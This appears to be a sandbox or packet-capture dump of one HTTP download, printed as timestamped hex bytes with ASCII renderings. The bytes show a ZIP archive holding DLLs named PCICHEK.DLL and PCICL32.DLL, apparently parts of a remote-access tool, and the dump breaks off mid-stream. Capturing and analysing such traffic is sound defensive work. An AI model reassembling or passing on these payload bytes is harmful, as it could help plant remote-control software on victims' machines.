                                                                                                                      2023-09-07 16:19:24 UTC539INData Raw: ed a0 91 0d ad ea 0b 0e eb ba ea fc ed 15 d8 32 7d 90 c4 a2 2f a4 5c b4 ec 0b 0d 17 59 8f ab 3a 09 5c dd 8a e3 ea 16 1c 57 37 3b 82 fd a6 21 63 7f f8 bb 89 b1 0b aa 51 28 fc d8 9d 88 79 2b b2 aa ca 3a 60 bb fd 66 e2 f2 1f 4b 1b 6b bb 66 c8 cc 8d ee e5 2e 2e e5 05 f1 dd a7 84 a9 51 1d 0b ab d7 19 26 96 36 d9 19 be 7f 6a d6 19 ea 33 7e 23 5d c3 bc 33 68 2c 3b 43 85 e8 95 eb a7 0a f6 7a 4e 75 1b f6 74 4e 65 c7 9c 62 19 cc 97 29 dc e6 25 fb a4 2b a9 9c 3b 6d ec 2e 8e d7 7d ff 17 c7 d1 b8 bc bc e3 b1 d1 68 de aa 11 b7 b9 96 26 79 7c cc 6d 5f 26 ac 64 cf 90 b5 89 05 15 c7 c8 95 87 d1 15 c7 c8 3a 46 84 db 4d 1f f6 14 74 8a 6e ba d0 c7 26 b2 22 0d a6 48 eb af 9e 96 e9 f7 01 c7 ea 06 5a c6 e2 3a 0a 9f 2d ae 96 7a 53 42 e6 ad 45 14 35 5e 17 74 5e e0 98 7e c8 43 bd
                                                                                                                      Data Ascii: 2}/\Y:\W7;!cQ(y+:`fKkf..Q&6j3~#]3h,;CzNutNeb)%+;m.}h&y|m_&d:FMtn&"HZ:-zSBE5^t^~C
                                                                                                                      2023-09-07 16:19:24 UTC547INData Raw: 69 d1 99 a4 5c d1 6f 49 79 a2 b3 49 67 24 e7 92 7e 93 5c 4c 3a 2b b9 92 74 4e 72 2d e9 bc a4 20 e9 82 a8 f0 ff 63 ef c9 e3 a2 aa f6 3f 83 94 98 56 58 88 a4 98 e3 96 5a a6 77 df e6 2e c3 00 2a 8a cb 03 05 5c 6a 1c 60 40 14 18 9a 19 14 d4 74 1c 7d a5 e8 7b 91 1b 9a 4b b8 64 be 22 5c 33 7d 3f 17 dc 8a 4a 0d 0d d7 d0 c8 78 b9 be 44 43 a3 42 7b e7 dc 19 70 18 90 e5 fd f7 3e 9f df e5 73 e6 7b cf b9 df e5 9c ef f9 9e ef b9 f7 7c ef 3d 38 4b 34 97 9c a7 34 97 9d a7 35 df 3b bf d5 94 3b 0b 34 3f 38 4b 35 57 9c 9f 68 7e 74 9e d1 54 38 0b 35 ff 72 9e d5 fc e4 3c a7 b9 ea 3c af b9 e6 bc a0 b9 ee bc a8 b9 e1 fc 4e 73 d3 59 e6 73 0b b6 e3 67 58 f7 db ce cd 9a 4a e7 25 cd 1d a7 56 a3 9f bb 5e 63 98 bb 41 93 39 77 a3 66 da dc 4d 9a 90 b9 1f 68 c2 e7 6e d3 4c 98 7b 59 33
                                                                                                                      Data Ascii: i\oIyIg$~\L:+tNr- c?VXZw.*\j`@t}{Kd"\3}?JxDCB{p>s{|=8K445;;4?8K5Wh~tT85r<<NsYsgXJ%V^cA9wfMhnL{Y3
                                                                                                                      2023-09-07 16:19:24 UTC554INData Raw: e4 92 f5 ca 48 39 4a 8e 95 13 e5 24 39 07 1c f9 15 39 0f ea bd b0 74 bd f2 93 6c 52 cc 8a ad e2 a0 38 1a ab 96 1e 8a a7 82 8c b5 4b 59 f1 52 bc 4b 57 30 fd 94 5e c0 c1 01 a0 85 83 95 90 bf ac 66 26 2a 49 4a f2 b7 35 cd 34 25 5d c9 54 b2 94 1c 25 57 f9 e7 d5 b7 3c 35 df d0 f5 66 53 bc 15 c8 1c 14 8b e2 51 02 9a 5f ba 22 9f 82 d6 a3 cd 28 15 a5 a1 74 94 89 b2 50 36 3a 8e 4e a3 1c 94 8b ae a0 47 a8 00 15 a2 22 f4 1a 15 a3 4f c8 44 99 29 5b c0 06 47 ca f9 1f d6 9c 4b 56 9b 03 a8 20 f0 1c 21 54 28 15 46 c5 52 f1 df d6 f5 93 a9 14 6a 3d 95 4e 65 52 59 54 36 75 1c 38 2f 8f ca a7 ee 01 2e 17 50 85 e0 4f 5e 43 f5 7f a2 4c b4 99 76 a6 5d 68 57 c0 69 77 1a d3 02 2d d3 5e b4 2f ed 47 f7 02 97 1b 00 2c 19 46 47 d0 91 74 14 1d 4b c7 d3 49 74 32 9d 42 af a7 d3 01 91 b2
                                                                                                                      Data Ascii: H9J$99tlR8KYRKW0^f&*IJ54%]T%W<5fSQ_"(tP6:NG"OD)[GKV !T(FRj=NeRYT6u8/.PO^CLv]hWiw-^/G,FGtKIt2B
                                                                                                                      2023-09-07 16:19:24 UTC562INData Raw: 49 ef 0b 1d 47 26 93 f5 24 13 c6 d2 42 ee 28 cf 92 af 41 ce cd 05 0f e1 a0 3a ab 9c 3a 49 bd ae ea e7 64 c7 68 2f a0 06 ec 8c 5c aa 84 28 14 89 c6 f1 d3 f8 79 fc 0a 3e 93 3f c4 ff cc 17 43 d6 b5 05 97 7c 48 b8 20 d8 eb 3d fd c8 ce 98 d7 03 d4 29 a3 27 de 86 ae 44 bb d0 2a 60 66 0f ba 3f cc 4c 38 bd 95 1e c1 4f 06 b5 b7 88 5f 03 48 70 8b 7f 04 9a e5 86 a0 8a 6d c4 1e 62 20 30 9b ae 33 ed 0c ef d0 17 0d 45 93 51 1c 9a 87 96 a2 fd c0 50 97 d1 1d 54 80 dc a9 15 54 94 72 41 fd a0 9a 02 ec 0c 7d ad 32 e7 20 37 6b 0a 66 31 0d 72 6c 90 16 ae 8f 3f d4 ce 58 a3 74 30 d6 27 69 24 19 3c d7 0d f5 43 c3 d0 28 d0 12 73 8c 5d d7 b5 68 07 da 8b 0e c0 6b 5f 41 f9 e8 3e 7a 02 2c 68 a2 ca 03 47 b7 03 5e 58 4a ad 36 e6 70 3f e4 c0 05 2a 8f 7a 46 15 19 67 01 ab d2 ae b4 3b 8d
                                                                                                                      Data Ascii: IG&$B(A::Idh/\(y>?C|H =)'D*`f?L8O_Hpmb 03EQPTTrA}2 7kf1rl?Xt0'i$<C(s]hk_A>z,hG^XJ6p?*zFg;
                                                                                                                      2023-09-07 16:19:24 UTC570INData Raw: 8b 82 dc ca 8b c2 ec 42 fe 26 6b 52 82 b1 3c 0c 55 9e 03 e7 69 6a ac 2b 8f be 64 b5 3a 90 85 cb 26 9c 23 2f 2d ba 08 b3 1c e7 d9 0e 06 66 cf 35 99 11 da ac 61 b1 36 24 a6 18 4f d3 81 d2 ab 5c 63 b9 1c ea 39 e5 2b 00 0e 9c 27 a7 7c 11 5e 09 2e 21 57 c5 29 9b 8b 05 18 09 44 50 55 0c 8a 46 8e f9 24 ac e1 26 b1 67 2c a2 d1 0b e5 7d 7a c7 12 5c 0a d4 0f c3 28 d6 04 13 04 a7 74 03 00 66 e1 7f e6 55 37 2e 21 05 af 37 97 a3 07 90 bd d9 8c 1e 62 ad 3f d9 90 cf d9 9f 9c 34 91 b2 a8 a9 de 14 37 ad ac 4b d8 87 86 61 6e 20 fb 51 99 57 49 80 15 da b0 78 82 1b 87 26 e3 5a 7e 51 ef 6b 2e 97 58 3b 5a 84 da 5c c6 c2 80 01 f1 48 fd 10 a0 d9 8c 2a 62 29 6c 80 87 f8 0b 9a f9 76 3c 60 74 a8 42 45 99 07 68 28 63 44 83 93 09 4b c3 84 d9 7f a4 9c 0d dd 09 d0 1b 0f 95 ca 6c 46 05
                                                                                                                      Data Ascii: B&kR<Uij+d:&#/-f5a6$O\c9+'|^.!W)DPUF$&g,}z\(tfU7.!7b?47Kan QWIx&Z~Qk.X;Z\H*b)lv<`tBEh(cDKlF
                                                                                                                      2023-09-07 16:19:24 UTC578INData Raw: 45 9f a6 6d ef d9 42 07 d7 9c 5b 90 0d 24 db 91 13 e3 91 f4 da 40 c6 aa 95 71 76 1a 27 a0 96 f8 bc 69 9a dc 51 b9 19 79 ba 9c 14 3c 8f 26 9a 83 a6 e1 56 88 16 22 13 c0 c1 db fb 31 9d 0a f4 ba dc b4 fc 59 04 1b 3d e9 d2 b4 3a 62 03 2b b3 20 3d 73 6a a6 9e 98 c1 ca 48 a3 82 ce 62 56 46 1e a0 22 68 14 3c 84 41 0b 58 19 60 05 05 c4 4f ac 1c 4d 4e 81 06 e4 71 0a 3d 21 54 44 8c 3a 21 22 4e 40 92 d4 18 01 8c e4 1c 50 86 bc b4 e4 34 9d 9e 30 b1 32 c0 32 40 a7 e8 c9 9a 5c 14 ca a4 27 e7 42 e0 41 6c a6 27 67 82 40 40 d0 39 c4 b7 ed cf c9 1a d0 d9 e4 94 9c 82 a9 c9 1a d0 41 82 10 d0 92 93 23 f2 f3 c7 a5 e5 eb c1 76 01 84 78 4e 43 88 93 d3 91 41 4e d5 e8 92 b5 79 79 10 71 aa 01 2e 2d 5b 93 92 9b ac 9f 95 af 01 7c 19 79 c9 b9 60 e8 05 f0 08 bd 72 53 80 32 33 33 d9 90
                                                                                                                      Data Ascii: EmB[$@qv'iQy<&V"1Y=:b+ =sjHbVF"h<AX`OMNq=!TD:!"N@P4022@\'BAl'g@@9A#vxNCANyyq.-[|y`rS233
                                                                                                                      2023-09-07 16:19:24 UTC586INData Raw: e0 ed 5e 91 7f ce 0f 58 fb 91 b8 a5 29 54 df 9b 33 0b 7d 77 f9 ff 00 50 4b 03 04 14 00 00 00 08 00 b4 7a ee 50 27 d4 1e 84 36 1f 00 00 78 49 00 00 0b 00 00 00 50 43 49 43 48 45 4b 2e 44 4c 4c ec 39 79 5c 53 c7 d6 73 93 80 61 11 52 d9 dc d0 40 a5 8a 28 dc 9b 0b 28 0a ca 16 95 16 34 25 08 2e a8 84 e4 02 91 6c de 9b 20 b4 5a 65 71 a1 11 b5 75 f7 f5 ab 58 a5 b5 4a 6b 17 17 5a 6b c5 a5 fa 6c b5 7d da be aa 75 6f ad e2 d2 aa cf d6 a5 5a f3 ce 4c 02 82 5b db 3f de ef fb 7d ef 73 70 e6 cc 59 e7 cc 99 99 33 73 63 c6 98 f9 48 8c 10 92 40 75 38 10 6a 40 ce 92 88 fe b8 9c 82 ea d3 fd 63 1f b4 c1 63 7f 48 03 95 be 3f 24 ab 48 2f c8 2d bc b9 90 d7 18 e5 5a 8d c9 64 b6 ca f3 39 39 6f 33 c9 f5 26 79 ea 08 b5 dc 68 d6 71 91 ed db 7b f6 70 d9 10 4a 3c b7 f4 0b d2 35 35 d7
                                                                                                                      Data Ascii: ^X)T3}wPKzP'6xIPCICHEK.DLL9y\SsaR@((4%.l ZequXJkZkl}uoZL[?}spY3scH@u8j@ccH?$H/-Zd99o3&yhq{pJ<55
                                                                                                                      2023-09-07 16:19:24 UTC594INData Raw: 51 37 c9 02 cc 96 b8 78 51 6a a7 ef fb df 6f 99 06 1b 95 70 c0 33 3a e2 7c 2e 9d 18 bd 06 45 5c c8 1f 3d 1a c4 1d 59 75 ed e6 a8 72 33 ef d3 07 55 73 7f e0 f1 1f 50 4b 03 04 14 00 00 00 08 00 b4 7a ee 50 29 8c b7 30 42 ae 14 00 78 ff 38 00 0b 00 00 00 50 43 49 43 4c 33 32 2e 44 4c 4c ec fd 0d 78 54 d5 b5 38 0e 9f f9 48 72 80 81 99 c0 04 82 46 8d 1a 15 0d 6a 34 60 13 06 6c 02 4c 08 ca 84 99 09 33 43 85 24 b4 55 3a 9d da 96 c2 0c 62 4b 42 e8 64 20 87 cd 20 6d 01 b1 d7 0f ac b6 e5 f6 d2 96 f6 22 60 2f 42 42 68 26 28 85 f0 21 04 01 a5 96 b6 07 93 da a8 14 02 46 ce 7f ad b5 cf 7c 66 40 7b 7f ff df fb 3e cf fb bc 81 99 39 67 7f ac fd b5 f6 da 6b ad bd f6 da b6 c7 d6 0a 3a 41 10 f4 f0 51 14 41 d8 29 f0 bf 32 e1 f3 ff 4c 1a 41 18 76 cb 1f 86 09 db 06 fd e9 d6 9d
                                                                                                                      Data Ascii: Q7xQjop3:|.E\=Yur3UsPKzP)0Bx8PCICL32.DLLxT8HrFj4`lL3C$U:bKBd m"`/BBh&(!F|f@{>9gk:AQA)2LAv
                                                                                                                      2023-09-07 16:19:24 UTC601INData Raw: 94 cf 28 c4 7a 1a 35 be e7 28 25 a6 f3 e9 2a 41 c6 86 94 b2 64 ed 22 65 30 b3 75 31 d7 69 7b b5 c3 49 a6 59 e7 20 49 b8 fc 33 4a 64 95 29 33 b3 75 80 e8 09 88 73 00 d0 87 27 82 77 66 3d ed a8 56 df 8f a9 d6 41 54 f9 4e 02 54 7f 16 47 60 ce 40 e3 ab 85 15 51 e1 c9 6d e7 c6 57 51 59 63 d0 a1 b8 1a 9a ec df 37 27 d9 bf c3 10 57 c7 ec f5 5f 9b 8d 47 e1 c8 1a 7d e0 18 1b 2b a2 cb 18 5f be 68 88 7d 7a 75 af c6 d6 83 aa 56 54 93 16 b6 1e be 5a d8 4e 5b f2 80 00 87 15 dd 65 66 eb 2d 6c e5 41 64 f6 ce ba f0 d4 e4 e1 4f 75 27 8d 3b 6c 74 6c b2 d5 ae 9e 7f 75 f2 e3 ca 00 0e e5 78 58 9d 5d 9d 12 99 d6 87 f5 0f f0 8a 01 1a 85 f5 0f e2 ee b4 eb 98 14 9a 8b e0 3a 25 57 17 87 2c b9 f6 01 a9 90 5c 1d 14 bf 8d 9e 77 12 a4 4d 61 f3 97 48 2f 70 41 b2 9d 96 6c bb 98 ad af b0
                                                                                                                      Data Ascii: (z5(%*Ad"e0u1i{IY I3Jd)3us'wf=VATNTG`@QmWQYc7'W_G}+_h}zuVTZN[ef-lAdOu';ltluxX]:%W,\wMaH/pAl
                                                                                                                      2023-09-07 16:19:24 UTC609INData Raw: 9f a2 fb 94 ce c3 1d 52 94 6a ba 76 b3 07 9e d4 2b cf 0c 42 50 89 2d 99 5f 5a cc 97 cc c8 a2 31 b8 64 62 a6 1f 7d 8c b5 17 61 35 f4 ee c4 95 b7 b4 dc bc 50 cb 06 95 56 98 17 de c3 32 bb c7 84 94 c0 df a5 06 5a ee 86 b1 cc ba 76 41 88 c2 c5 02 da c9 ef bc 01 c2 3c ba b7 1c 76 f9 27 cf d0 62 4a 67 06 1a 4c 0b 8d 2c b3 5d 5f 22 c4 aa c2 da 93 5e 91 34 26 c8 7b 83 8e 24 e8 d3 73 af a3 4f 0f 88 5c 33 f9 da 2c f4 c6 f5 52 37 90 a3 87 bc fb 70 0c 5f ab c4 90 f0 13 26 e2 b1 42 33 ae 22 87 8d b7 d5 46 fc a3 58 95 81 d4 a2 ac 43 9e f8 23 d4 59 cf 86 d8 ee 4c e9 8d d9 64 38 61 40 cd 9e e8 d3 a8 9a 04 e5 48 38 74 1a 15 0e de be 9c 9b b3 e5 0f 3a 49 5f b8 89 d0 d7 18 fa 4f 14 3e 43 05 a4 fa ce a7 ef 31 f4 3d 96 be 8b e8 7b 1c 7d 97 d0 f7 44 fa 2e a3 ef a9 e4 74 0c f3
                                                                                                                      Data Ascii: Rjv+BP-_Z1db}a5PV2ZvA<v'bJgL,]_"^4&{$sO\3,R7p_&B3"FXC#YLd8a@H8t:I_O>C1={}D.t
                                                                                                                      2023-09-07 16:19:24 UTC617INData Raw: 67 9c e7 d2 8e d3 48 db 48 ab c2 86 62 88 c3 fb 38 e6 f8 3a cf 51 57 dc 52 9b 68 80 cb d7 df 89 c7 e2 e7 21 d2 2e be de c7 a1 1c f9 9f f7 f3 13 0e 2e 13 6e 98 88 d2 53 b0 6a e9 f1 18 4a 85 49 7a 98 4d ea 1f 87 ce 09 aa 80 71 31 28 27 c2 55 63 1c f0 ed 2e 43 bb ef 8a d9 76 e5 44 ca e9 07 ba 46 9c 4c dd 6a 34 d1 1d db 8d 48 c1 5e 3f 44 3b b6 3e bd bc ec fe 84 93 11 02 3f 19 31 9c 91 ab 6b 87 4f c3 3a e4 61 13 f9 f9 88 e0 21 c5 a7 47 76 94 ee 14 97 a7 dd 3f f0 44 c5 70 46 b7 8e 3b 29 df 71 0b cf a7 66 42 32 28 0f 4f cc a4 4d 53 d8 cb c9 99 68 dd 3b 73 5f 42 26 5d 9a 92 9e 54 33 49 2b 7a c8 65 02 f2 4c 68 33 28 d1 e6 84 92 23 e0 ce c7 6a 68 76 f3 8a 52 0a a0 cd 8e 15 66 2d 81 5a c2 26 e1 86 85 77 a9 1b b7 1b 4e 48 64 84 c0 28 d6 fb 24 0f 63 6b e8 6d 2e bc 39
                                                                                                                      Data Ascii: gHHb8:QWRh!..nSjJIzMq1('Uc.CvDFLj4H^?D;>?1kO:a!Gv?DpF;)qfB2(OMSh;s_B&]T3I+zeLh3(#jhvRf-Z&wNHd($ckm.9
                                                                                                                      2023-09-07 16:19:24 UTC625INData Raw: 84 f6 38 d0 e0 04 2f bc 42 c1 ab df c9 0e 4a 56 51 f6 23 f5 b0 f6 5b 2a f4 b5 c6 f5 2d f1 09 ce db 3f e6 44 02 ff 95 5e dd 16 9d 9e 33 0c 39 e8 cd 32 8b 0d 93 b7 5e c6 7b 89 98 88 fc cd 54 6d 89 5a 67 a4 41 9c 5f 12 95 ce c4 ea 26 fa 4b 41 af d9 65 7a 5c 26 58 83 1e d0 7c fd a7 8a 82 24 eb 51 11 cf f7 55 89 2a bf 14 28 61 9c 1d 1e cc 5a f9 93 ff a2 a4 45 16 ba 0a 90 91 f3 a3 43 58 87 fa e8 ff 57 1d 64 e5 fe 53 a4 e1 90 aa 4e 5a ac be a6 8c b7 f7 73 e9 01 d2 b3 80 08 ad ab d4 b3 19 0f 94 14 9f 62 57 a5 9a 1e a9 fe 34 8c 6d 16 5e 4a a8 87 c6 0d 43 43 99 a5 45 86 a8 f7 ea 80 11 98 c5 89 78 2d 21 eb 90 7f ff 2f ea 1d bb 5e 77 3c f8 7d 83 60 5c d7 d2 6c 3d ab 9e b7 6e 6a 31 36 e1 35 f6 ec 91 02 36 39 3f b4 7f d9 b0 a5 19 c1 3e cd 53 59 78 a5 a7 dc 3d 24 28 6b
                                                                                                                      Data Ascii: 8/BJVQ#[*-?D^392^{TmZgA_&KAez\&X|$QU*(aZECXWdSNZsbW4m^JCCEx-!/^w<}`\l=nj16569?>SYx=$(k
                                                                                                                      2023-09-07 16:19:24 UTC633INData Raw: fe 5d f4 97 05 b5 28 6e 29 ad 10 eb 8c eb f1 1a 90 fc 14 fd 18 94 83 27 ee a2 e6 39 26 3b 9e 7f b2 9a ed 0e a7 47 3d bc 2d 55 e5 49 6e 83 d4 20 2a 39 05 0f 40 89 99 54 e0 23 de 25 58 a0 17 be e4 1c b7 7a 83 5b 69 a6 5a 8a 59 88 c3 47 1b 72 3a 52 88 ae 39 b1 8c 5c 04 4e 17 bc 89 d5 76 a9 2a 57 72 9b a5 06 13 ea 92 e6 de 2a 22 2a 0a 54 0c bf dc 9d 80 e2 29 ee 39 03 cd 9d 62 fe f1 87 42 26 3d 64 4a f6 8e 1f 6f 9f 89 dc bd 98 e3 fd e8 c0 7b d4 48 1d 78 f9 2a a9 03 79 95 c9 9f 47 2e ae a7 dc 5a 0b f2 60 ff 93 35 80 71 47 27 bf 7e 4d e0 1b 58 f2 2d 8a 9a 33 5e ad f3 df 82 b0 d4 fe 35 84 0d 65 aa a3 c0 c7 97 5f 6e d2 21 41 3a 0f 30 96 5f 36 0d c3 e7 33 f4 7c 1f 3d 1f a6 e7 e9 ab 32 e0 f9 8f f4 3c 85 9e 5f a7 e7 e7 46 e2 f3 af e9 f9 15 0a 7f 99 9e b7 d0 33 6e c4
                                                                                                                      Data Ascii: ](n)'9&;G=-UIn *9@T#%Xz[iZYGr:R9\Nv*Wr*"*T)9bB&=dJo{Hx*yG.Z`5qG'~MX-3^5e_n!A:0_63|=2<_F3n
                                                                                                                      2023-09-07 16:19:24 UTC640INData Raw: ff 10 1b 9b 89 f6 ae 15 ea e1 5a 60 5c 71 d4 5f 99 2e 38 08 fe db 2e 72 b2 93 ea 37 c1 5c ab 87 23 e8 e9 87 78 9d 80 c4 2f 9c c4 c5 c3 ba 78 c6 49 e1 94 ea 82 05 6f 73 0f 08 dd ad 38 ba 9d 4a 49 0f 39 ed e7 df e9 26 12 1c ae ea 31 84 32 13 04 00 48 52 37 52 f8 cd 1d 18 dd 43 29 e9 a6 98 ec fc 75 34 5b 26 b9 d4 c7 b7 36 56 24 f2 9f 01 d5 df 11 7f be 1f 75 e9 f3 bd b0 b6 33 06 92 85 1e 99 7f be 5f 13 77 d9 6a b7 e2 91 f3 82 70 5d 54 bb 11 65 64 bd 05 13 b6 da 95 74 40 c6 03 aa 4b 57 ae d3 71 57 e8 48 98 82 a7 33 37 ab a7 13 ae cb ed 5f fb 10 70 b7 05 7f 1f 0c 54 06 a5 19 e1 9d e9 28 d9 38 18 e8 f4 b2 6e f5 e0 e9 66 92 6e 58 e9 d7 62 ab a5 fb 73 66 83 2e 40 d8 45 1a 29 89 1f 5d 3a 20 6a c2 2e 5c 37 3c a4 89 1f 74 77 a4 ed 33 63 82 03 e0 a3 45 f1 be 8f ea 7f
                                                                                                                      Data Ascii: Z`\q_.8.r7\#x/xIos8JI9&12HR7RC)u4[&6V$u3_wjp]Tedt@KWqWH37_pT(8nfnXbsf.@E)]: j.\7<tw3cE
                                                                                                                      2023-09-07 16:19:24 UTC648INData Raw: 08 b7 cc f2 ff aa e5 e6 ff b7 03 63 f9 7f 02 de d1 8d b8 0c 88 f3 01 2c ab 70 f7 0c db ca 37 cf 93 80 b4 dc 2a 97 5b 72 4f 29 0e 8b 53 29 81 b3 e3 7b fc f8 57 74 85 c2 61 95 cd 43 98 0d 03 b8 cc 18 64 0e ef b2 84 2f 14 2f 6d cb 3d 45 fa 68 72 a4 14 57 e6 55 2c e3 33 6b 85 a6 9b 63 a5 ee 09 b5 2d bb 40 78 bc 27 7a 33 4d b3 67 b2 b0 96 f0 c7 fd 82 49 39 4d e1 46 4b e2 21 27 6a 9f 67 d7 43 de 91 05 d0 ea 46 8f 5c 82 f8 cf d1 1e 3c 77 37 0c 87 5c 42 ee 81 8c e8 56 bd d9 d8 d1 5f 5b 7f 25 78 f3 49 0a 16 29 9e 33 05 ef 2e cc 50 e0 10 04 9b 92 97 9b be 42 85 a1 a5 1d af 82 e5 ec 50 ac c3 31 24 94 33 20 b9 f8 7f cf 24 1b 2c c8 a5 78 cd 6e 2f 7f ff df 22 27 3a 74 53 26 9f 29 68 59 38 c1 b6 79 50 dd f4 0b b6 cd 5e 83 32 f5 42 9d 4f b5 6d 2e 35 d6 d9 e0 dd 54 e7 33
                                                                                                                      Data Ascii: c,p7*[rO)S){WtaCd//m=EhrWU,3kc-@x'z3MgI9MFK!'jgCF\<w7\BV_[%xI)3.PBP1$3 $,xn/"':tS&)hY8yP^2BOm.5T3
                                                                                                                      2023-09-07 16:19:24 UTC656INData Raw: cb 80 65 55 76 e8 8b 64 8b 84 71 40 76 07 1f c3 11 1a a9 1e 38 5d 68 41 85 5c e8 a7 6c 10 bf 63 aa 59 72 fa 7f 8e 42 ad 0d 73 f5 ed a8 eb 42 dc 76 d4 75 41 6c 47 df bc 0f bd 87 fb d0 55 47 29 86 8f 49 83 02 73 30 00 52 da cb 0c 78 6d 16 37 de 74 0c c3 83 17 eb 0e 1e 89 f2 25 64 70 c0 27 a9 16 49 58 1b 28 f5 5b 28 50 b8 d3 2a 3e e9 56 6c 11 4c 26 16 e5 00 53 76 e2 68 f5 cd a5 68 e6 6c cf e3 80 06 ec 1e 0d fe 4b a6 fe 18 5d 9e ac 19 a2 76 6d 54 1f 9a b6 51 1e b4 6e f3 f0 87 6f d6 ad db 06 47 bf 7b f4 0c 5a 0a 71 2f 7a 5a 5f 9c ce bc 35 82 7b 89 cb ce 9e c7 c0 e7 09 85 7a b1 3c df d3 0a 0d 82 a9 aa a7 90 e9 85 c0 f2 78 60 d3 11 a5 f4 85 31 35 09 ba 42 28 11 de 61 16 b8 51 f0 3c e2 86 2d d2 79 5e 55 fb e2 5e 22 d9 7d 5c 46 d2 e8 89 4c 38 97 4a 07 a4 07 cd b2
                                                                                                                      Data Ascii: eUvdq@v8]hA\lcYrBsBvuAlGUG)Is0Rxm7t%dp'IX([(P*>VlL&SvhhlK]vmTQnoG{Zq/zZ_5{z<x`15B(aQ<-y^U^"}\FL8J
                                                                                                                      2023-09-07 16:19:24 UTC664INData Raw: 53 bc 80 81 3f 5e 9f 22 56 c9 72 34 4f d1 04 69 79 ac d0 ac 1b 46 38 ba 0a ba 83 63 a1 79 46 d9 d1 09 64 fa 0a ff b5 28 37 7f 05 da e4 7f 19 1b f6 b6 0f 4f 82 9d 80 0b 48 d4 cb 5f c0 29 31 17 54 75 85 f6 f0 c2 d5 74 8d fc 97 62 7b 7f e9 8f 29 12 99 b3 98 25 5b ed 5a 3c 96 bc ad 09 63 7e 26 69 3e f7 c9 2c 9c 0e b6 68 91 8c 67 23 ed 7f 06 74 51 ea b5 c4 a5 a8 70 88 d5 0e 86 37 26 ea a6 be eb d3 8f 70 81 2e a7 e6 df bd 7b d9 67 aa 7a fe 23 ad c0 75 89 05 ce 78 f5 63 a9 2f d0 e5 12 ee db a9 a1 16 29 58 a0 35 32 74 6b df 17 d2 b7 7a f5 53 28 5e 9c cc c0 5d 33 76 b4 86 2e 71 6b 59 b2 18 01 7e 2d 3c b1 a2 20 7b 34 13 46 d3 6d 81 69 c3 4b dd fe d1 53 8c a9 fe 41 92 44 e6 ae b0 07 a2 e1 97 c5 e3 d2 bf 00 7e 8e ee fb 8b 64 b8 54 19 ab fe 05 1a 80 7e 3e e9 2a 01 ba
                                                                                                                      Data Ascii: S?^"Vr4OiyF8cyFd(7OH_)1Tutb{)%[Z<c~&i>,hg#tQp7&p.{gz#uxc/)X52tkzS(^]3v.qkY~-< {4FmiKSAD~dT~>*
                                                                                                                      2023-09-07 16:19:24 UTC672INData Raw: ef 5f 6b 22 39 82 35 72 aa 7a 36 9b 6e f6 8f 7e 0a 59 81 47 7e a5 ef ef a3 9d 4e 20 1c df ff 40 27 1c 43 df 1a 4d 36 58 65 9d 1d 19 81 14 fe f1 1b 54 5f c7 cf 1b 6e a1 64 47 27 de 02 4e 63 6e 6b c0 e4 c5 2a 58 3f 17 85 e3 09 37 5b c3 77 4a a1 27 a2 e7 74 ff af a3 2c 0f cd af 33 8e 59 51 1c 0d ce dc 53 81 91 72 a8 41 0e 6d 52 33 d6 8e 11 f6 37 a3 c5 96 b3 86 ec bc 1a 3c 3e a5 64 93 cb eb 65 63 f7 8e c6 9b 9f 18 db b0 7c 93 87 57 e0 31 b3 5b 0c c9 5c 56 02 0c e1 26 a7 c7 17 30 c1 ae 9c 7b 34 ff ea 45 93 95 c5 66 a5 6c a3 5b 71 6c 71 7a 51 a7 b9 b1 90 1c f7 6e 01 c4 de 39 9a 6c f5 58 91 59 29 d9 02 67 20 d8 4c fc 4e a4 52 96 7f a5 4a 93 01 5f c3 bb ac 05 57 3f d4 e8 e3 2b 37 69 17 1f 1a e6 cc d2 ec b4 c5 82 ea 41 c3 c7 15 bf 8a f6 ae 4f fd 07 d4 cb c7 1e 82
                                                                                                                      Data Ascii: _k"95rz6n~YG~N @'CM6XeT_ndG'Ncnk*X?7[wJ't,3YQSrAmR37<>dec|W1[\V&0{4Efl[qlqzQn9lXY)g LNRJ_W?+7iAO
                                                                                                                      2023-09-07 16:19:24 UTC679INData Raw: a5 24 ff 2b 58 95 b4 49 9c 0f 4f 85 66 84 15 c4 54 43 c7 3d e1 ad 58 a5 2d 34 29 60 88 03 1e 41 e0 4e 01 3c 90 43 c0 a1 31 c3 fd 6b 10 cc 9b 82 eb e8 b0 39 bd fe a5 98 f0 0a 25 58 a3 08 61 e4 87 71 22 75 64 32 f0 66 78 65 b4 42 3a ee e9 0b 67 1f 97 74 9c 75 79 95 fa 05 e7 13 c7 11 03 11 2b 0a a6 ba 78 39 72 65 3b 33 fb d3 42 63 b4 2a d0 c2 12 41 15 ba 9d da 5a a4 64 7e 20 4b 5c 9a 3b 82 1b 2f 55 46 b2 e0 07 bc 29 52 c7 6d bd 69 ea df 51 d7 e7 4c 4c db 0f 69 5e ff 3c ec e1 ae 3f 91 e2 35 ba 8a 89 dc 7d 89 03 2c 1a d2 c7 b1 72 ca 03 7d 48 47 74 fa 62 e9 8a a3 2f 63 92 be 41 fe 9b 7b 54 51 1a cf 92 45 2f fe dd da 8a 7f 9f ef 84 bf fc a6 1f a6 48 ba 03 c5 73 b6 da f9 d0 83 bc ab 6d b5 15 b4 d0 0f 61 8e 01 3f 4c 89 f3 22 63 f1 28 f5 98 ec f6 8f ff a5 76 99 8c
                                                                                                                      Data Ascii: $+XIOfTC=X-4)`AN<C1k9%Xaq"ud2fxeB:gtuy+x9re;3Bc*AZd~ K\;/UF)RmiQLLi^<?5},r}HGtb/cA{TQE/Hsma?L"c(v
                                                                                                                      2023-09-07 16:19:24 UTC687INData Raw: 0a 19 a2 d8 fe 85 39 a6 af 89 be 25 9e fb 83 54 89 75 e1 69 84 4e 4f cf 63 95 c3 1e 45 9c 1a 16 d6 4c 0b 6e 93 ab 30 a5 1f a5 08 0d 4b 67 b9 96 73 04 b6 41 79 64 08 23 97 91 9e 0f ac aa 4c 79 2e e6 e4 8f 50 4e 3d 10 19 34 3a 18 c7 2d c6 dc 99 df a0 6c 96 c9 aa 12 fb 0b 74 26 5b a5 9e 7b 7d c9 23 f3 c9 93 b0 ae e7 1f 11 3b d3 0e 9c 0d e1 fa e2 20 4f bb d6 22 09 ab f2 83 fc ec 70 f8 dd 2d 7e 7f 31 dc 62 b8 52 7a d3 46 87 24 7e ff d3 a4 1b 99 f2 66 3a aa d3 d2 ad 5d fa 2f b2 24 4c da 29 2e ed 7c 7c fd 0f f1 dc 3e 45 48 67 60 d2 52 79 ea 44 fd be 4e 68 76 fb 54 d1 a9 80 54 ce 0e 46 e9 37 d1 6d c7 78 e1 7f 09 69 28 df a3 02 bf 44 53 e5 f6 c8 c3 b1 